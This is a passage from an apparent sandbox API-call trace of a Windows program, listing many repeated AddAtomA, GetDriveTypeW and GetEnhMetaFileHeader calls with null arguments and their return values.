(lpRootPathName=0x0) returned 0x3 [0097.512] AddAtomA (lpString=0x0) returned 0x0 [0097.512] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.512] AddAtomA (lpString=0x0) returned 0x0 [0097.512] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.512] AddAtomA (lpString=0x0) returned 0x0 [0097.512] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.512] AddAtomA (lpString=0x0) returned 0x0 [0097.512] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.512] AddAtomA (lpString=0x0) returned 0x0 [0097.512] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.512] AddAtomA (lpString=0x0) returned 0x0 [0097.512] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.512] AddAtomA (lpString=0x0) returned 0x0 [0097.512] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.512] AddAtomA (lpString=0x0) returned 0x0 [0097.512] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.512] AddAtomA (lpString=0x0) returned 0x0 [0097.512] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.512] AddAtomA (lpString=0x0) returned 0x0 [0097.512] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.512] AddAtomA (lpString=0x0) returned 0x0 [0097.512] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.512] AddAtomA (lpString=0x0) returned 0x0 [0097.512] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.513] AddAtomA (lpString=0x0) returned 0x0 [0097.513] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.513] AddAtomA (lpString=0x0) returned 0x0 [0097.513] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.513] AddAtomA (lpString=0x0) returned 0x0 [0097.513] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.513] AddAtomA (lpString=0x0) returned 0x0 [0097.513] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.513] AddAtomA (lpString=0x0) returned 0x0 [0097.513] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.513] AddAtomA (lpString=0x0) returned 0x0 [0097.513] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.513] AddAtomA (lpString=0x0) returned 0x0 [0097.513] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.513] AddAtomA (lpString=0x0) returned 0x0 [0097.513] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.513] AddAtomA (lpString=0x0) returned 0x0 [0097.513] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.513] AddAtomA (lpString=0x0) returned 0x0 [0097.513] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.513] AddAtomA (lpString=0x0) returned 0x0 [0097.513] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.513] AddAtomA (lpString=0x0) returned 0x0 [0097.513] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.513] AddAtomA (lpString=0x0) returned 0x0 [0097.513] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.513] AddAtomA (lpString=0x0) returned 0x0 [0097.513] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.514] AddAtomA (lpString=0x0) returned 0x0 [0097.514] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.514] AddAtomA (lpString=0x0) returned 0x0 [0097.514] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.514] AddAtomA (lpString=0x0) returned 0x0 [0097.514] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.514] AddAtomA (lpString=0x0) returned 0x0 [0097.514] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.514] AddAtomA (lpString=0x0) returned 0x0 [0097.514] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.514] AddAtomA (lpString=0x0) returned 0x0 [0097.514] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.514] AddAtomA (lpString=0x0) returned 0x0 [0097.514] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.514] AddAtomA (lpString=0x0) returned 0x0 [0097.514] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.514] AddAtomA (lpString=0x0) returned 0x0 [0097.514] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.514] AddAtomA (lpString=0x0) returned 0x0 [0097.514] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.514] AddAtomA (lpString=0x0) returned 0x0 [0097.514] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.514] AddAtomA (lpString=0x0) returned 0x0 [0097.514] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.514] AddAtomA (lpString=0x0) returned 0x0 [0097.514] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.514] AddAtomA (lpString=0x0) returned 0x0 [0097.514] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.515] AddAtomA (lpString=0x0) returned 0x0 [0097.515] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.515] AddAtomA (lpString=0x0) returned 0x0 [0097.515] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.515] AddAtomA (lpString=0x0) returned 0x0 [0097.515] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.515] AddAtomA (lpString=0x0) returned 0x0 [0097.515] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.515] AddAtomA (lpString=0x0) returned 0x0 [0097.515] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.515] AddAtomA (lpString=0x0) returned 0x0 [0097.515] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.515] AddAtomA (lpString=0x0) returned 0x0 [0097.515] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.515] AddAtomA (lpString=0x0) returned 0x0 [0097.515] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.515] AddAtomA (lpString=0x0) returned 0x0 [0097.515] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.515] AddAtomA (lpString=0x0) returned 0x0 [0097.515] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.515] AddAtomA (lpString=0x0) returned 0x0 [0097.515] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.515] AddAtomA (lpString=0x0) returned 0x0 [0097.515] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.515] AddAtomA (lpString=0x0) returned 0x0 [0097.515] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.515] AddAtomA (lpString=0x0) returned 0x0 [0097.515] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.515] AddAtomA (lpString=0x0) returned 0x0 [0097.515] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.515] AddAtomA (lpString=0x0) returned 0x0 [0097.515] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.515] AddAtomA (lpString=0x0) returned 0x0 [0097.515] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.515] AddAtomA (lpString=0x0) returned 0x0 [0097.515] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.516] AddAtomA (lpString=0x0) returned 0x0 [0097.516] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.516] AddAtomA (lpString=0x0) returned 0x0 [0097.516] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.516] AddAtomA (lpString=0x0) returned 0x0 [0097.516] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.516] AddAtomA (lpString=0x0) returned 0x0 [0097.516] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.516] AddAtomA (lpString=0x0) returned 0x0 [0097.516] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.516] AddAtomA (lpString=0x0) returned 0x0 [0097.516] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.516] AddAtomA (lpString=0x0) returned 0x0 [0097.516] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.516] AddAtomA (lpString=0x0) returned 0x0 [0097.516] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.516] AddAtomA (lpString=0x0) returned 0x0 [0097.516] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.516] AddAtomA (lpString=0x0) returned 0x0 [0097.516] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.516] AddAtomA (lpString=0x0) returned 0x0 [0097.516] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.516] AddAtomA (lpString=0x0) returned 0x0 [0097.516] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.516] AddAtomA (lpString=0x0) returned 0x0 [0097.516] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.516] AddAtomA (lpString=0x0) returned 0x0 [0097.516] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.516] AddAtomA (lpString=0x0) returned 0x0 [0097.516] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.517] AddAtomA (lpString=0x0) returned 0x0 [0097.517] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.517] AddAtomA (lpString=0x0) returned 0x0 [0097.517] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.517] AddAtomA (lpString=0x0) returned 0x0 [0097.517] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.517] AddAtomA (lpString=0x0) returned 0x0 [0097.517] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.517] AddAtomA (lpString=0x0) returned 0x0 [0097.517] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.517] AddAtomA (lpString=0x0) returned 0x0 [0097.517] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.517] AddAtomA (lpString=0x0) returned 0x0 [0097.517] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.517] AddAtomA (lpString=0x0) returned 0x0 [0097.517] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.517] AddAtomA (lpString=0x0) returned 0x0 [0097.517] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.517] AddAtomA (lpString=0x0) returned 0x0 [0097.517] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.517] AddAtomA (lpString=0x0) returned 0x0 [0097.517] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.517] AddAtomA (lpString=0x0) returned 0x0 [0097.517] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.517] AddAtomA (lpString=0x0) returned 0x0 [0097.517] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.517] AddAtomA (lpString=0x0) returned 0x0 [0097.517] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.517] AddAtomA (lpString=0x0) returned 0x0 [0097.517] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.518] AddAtomA (lpString=0x0) returned 0x0 [0097.518] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.518] AddAtomA (lpString=0x0) returned 0x0 [0097.518] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.518] AddAtomA (lpString=0x0) returned 0x0 [0097.518] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.518] AddAtomA (lpString=0x0) returned 0x0 [0097.518] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.518] AddAtomA (lpString=0x0) returned 0x0 [0097.518] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.518] AddAtomA (lpString=0x0) returned 0x0 [0097.518] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.518] AddAtomA (lpString=0x0) returned 0x0 [0097.518] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.518] AddAtomA (lpString=0x0) returned 0x0 [0097.518] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.518] AddAtomA (lpString=0x0) returned 0x0 [0097.518] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.518] AddAtomA (lpString=0x0) returned 0x0 [0097.518] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.518] AddAtomA (lpString=0x0) returned 0x0 [0097.518] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.518] AddAtomA (lpString=0x0) returned 0x0 [0097.518] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.518] AddAtomA (lpString=0x0) returned 0x0 [0097.518] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.518] AddAtomA (lpString=0x0) returned 0x0 [0097.518] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.519] AddAtomA (lpString=0x0) returned 0x0 [0097.519] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.519] AddAtomA (lpString=0x0) returned 0x0 [0097.519] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.519] AddAtomA (lpString=0x0) returned 0x0 [0097.519] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.519] AddAtomA (lpString=0x0) returned 0x0 [0097.519] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.519] AddAtomA (lpString=0x0) returned 0x0 [0097.519] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.519] AddAtomA (lpString=0x0) returned 0x0 [0097.519] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.519] AddAtomA (lpString=0x0) returned 0x0 [0097.519] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.519] AddAtomA (lpString=0x0) returned 0x0 [0097.519] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.519] AddAtomA (lpString=0x0) returned 0x0 [0097.519] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.519] AddAtomA (lpString=0x0) returned 0x0 [0097.519] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.519] AddAtomA (lpString=0x0) returned 0x0 [0097.519] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.519] AddAtomA (lpString=0x0) returned 0x0 [0097.519] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.519] AddAtomA (lpString=0x0) returned 0x0 [0097.519] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.519] AddAtomA (lpString=0x0) returned 0x0 [0097.519] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.519] AddAtomA (lpString=0x0) returned 0x0 [0097.519] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.520] AddAtomA (lpString=0x0) returned 0x0 [0097.520] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.520] AddAtomA (lpString=0x0) returned 0x0 [0097.520] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.520] AddAtomA (lpString=0x0) returned 0x0 [0097.520] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.520] AddAtomA (lpString=0x0) returned 0x0 [0097.520] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.520] AddAtomA (lpString=0x0) returned 0x0 [0097.520] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.520] AddAtomA (lpString=0x0) returned 0x0 [0097.520] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.520] AddAtomA (lpString=0x0) returned 0x0 [0097.520] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.520] AddAtomA (lpString=0x0) returned 0x0 [0097.520] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.520] AddAtomA (lpString=0x0) returned 0x0 [0097.520] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.520] AddAtomA (lpString=0x0) returned 0x0 [0097.520] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.520] AddAtomA (lpString=0x0) returned 0x0 [0097.520] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.520] AddAtomA (lpString=0x0) returned 0x0 [0097.520] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.520] AddAtomA (lpString=0x0) returned 0x0 [0097.520] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.520] AddAtomA (lpString=0x0) returned 0x0 [0097.520] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.521] AddAtomA (lpString=0x0) returned 0x0 [0097.521] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.521] AddAtomA (lpString=0x0) returned 0x0 [0097.521] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.521] AddAtomA (lpString=0x0) returned 0x0 [0097.521] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.521] AddAtomA (lpString=0x0) returned 0x0 [0097.521] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.521] AddAtomA (lpString=0x0) returned 0x0 [0097.521] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.521] AddAtomA (lpString=0x0) returned 0x0 [0097.521] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.521] AddAtomA (lpString=0x0) returned 0x0 [0097.521] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.521] AddAtomA (lpString=0x0) returned 0x0 [0097.521] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.521] AddAtomA (lpString=0x0) returned 0x0 [0097.521] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.521] AddAtomA (lpString=0x0) returned 0x0 [0097.521] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.521] AddAtomA (lpString=0x0) returned 0x0 [0097.521] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.521] AddAtomA (lpString=0x0) returned 0x0 [0097.521] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.521] AddAtomA (lpString=0x0) returned 0x0 [0097.521] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.521] AddAtomA (lpString=0x0) returned 0x0 [0097.521] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.522] AddAtomA (lpString=0x0) returned 0x0 [0097.522] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.522] AddAtomA (lpString=0x0) returned 0x0 [0097.522] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.522] AddAtomA (lpString=0x0) returned 0x0 [0097.522] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.522] AddAtomA (lpString=0x0) returned 0x0 [0097.522] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.522] AddAtomA (lpString=0x0) returned 0x0 [0097.522] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.522] AddAtomA (lpString=0x0) returned 0x0 [0097.522] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.522] AddAtomA (lpString=0x0) returned 0x0 [0097.522] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.522] AddAtomA (lpString=0x0) returned 0x0 [0097.522] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.522] AddAtomA (lpString=0x0) returned 0x0 [0097.522] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.522] AddAtomA (lpString=0x0) returned 0x0 [0097.522] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.522] AddAtomA (lpString=0x0) returned 0x0 [0097.522] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.522] AddAtomA (lpString=0x0) returned 0x0 [0097.522] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.522] AddAtomA (lpString=0x0) returned 0x0 [0097.522] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.522] AddAtomA (lpString=0x0) returned 0x0 [0097.522] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.522] AddAtomA (lpString=0x0) returned 0x0 [0097.523] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.523] AddAtomA (lpString=0x0) returned 0x0 [0097.523] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.523] AddAtomA (lpString=0x0) returned 0x0 [0097.523] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.523] AddAtomA (lpString=0x0) returned 0x0 [0097.523] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.523] AddAtomA (lpString=0x0) returned 0x0 [0097.523] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.523] AddAtomA (lpString=0x0) returned 0x0 [0097.523] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.523] AddAtomA (lpString=0x0) returned 0x0 [0097.523] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.523] AddAtomA (lpString=0x0) returned 0x0 [0097.523] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.523] AddAtomA (lpString=0x0) returned 0x0 [0097.523] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.523] AddAtomA (lpString=0x0) returned 0x0 [0097.523] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.523] AddAtomA (lpString=0x0) returned 0x0 [0097.523] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.523] AddAtomA (lpString=0x0) returned 0x0 [0097.523] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.523] AddAtomA (lpString=0x0) returned 0x0 [0097.523] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.523] AddAtomA (lpString=0x0) returned 0x0 [0097.523] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.523] AddAtomA (lpString=0x0) returned 0x0 [0097.523] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.524] AddAtomA (lpString=0x0) returned 0x0 [0097.524] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.524] AddAtomA (lpString=0x0) returned 0x0 [0097.524] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.524] AddAtomA (lpString=0x0) returned 0x0 [0097.524] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.524] AddAtomA (lpString=0x0) returned 0x0 [0097.524] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.524] AddAtomA (lpString=0x0) returned 0x0 [0097.524] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.524] AddAtomA (lpString=0x0) returned 0x0 [0097.524] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.524] AddAtomA (lpString=0x0) returned 0x0 [0097.524] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.525] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.525] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.525] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.526] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.526] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.526] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.526] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.526] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.526] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.526] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.526] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.526] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.526] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.526] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.526] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.526] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.526] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.526] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.526] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.526] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.526] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.526] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.526] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.526] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.526] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.526] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.526] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.526] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.526] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.526] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.526] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.526] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.526] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.526] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.526] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.526] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.526] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.526] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.526] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.526] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.526] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.526] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, 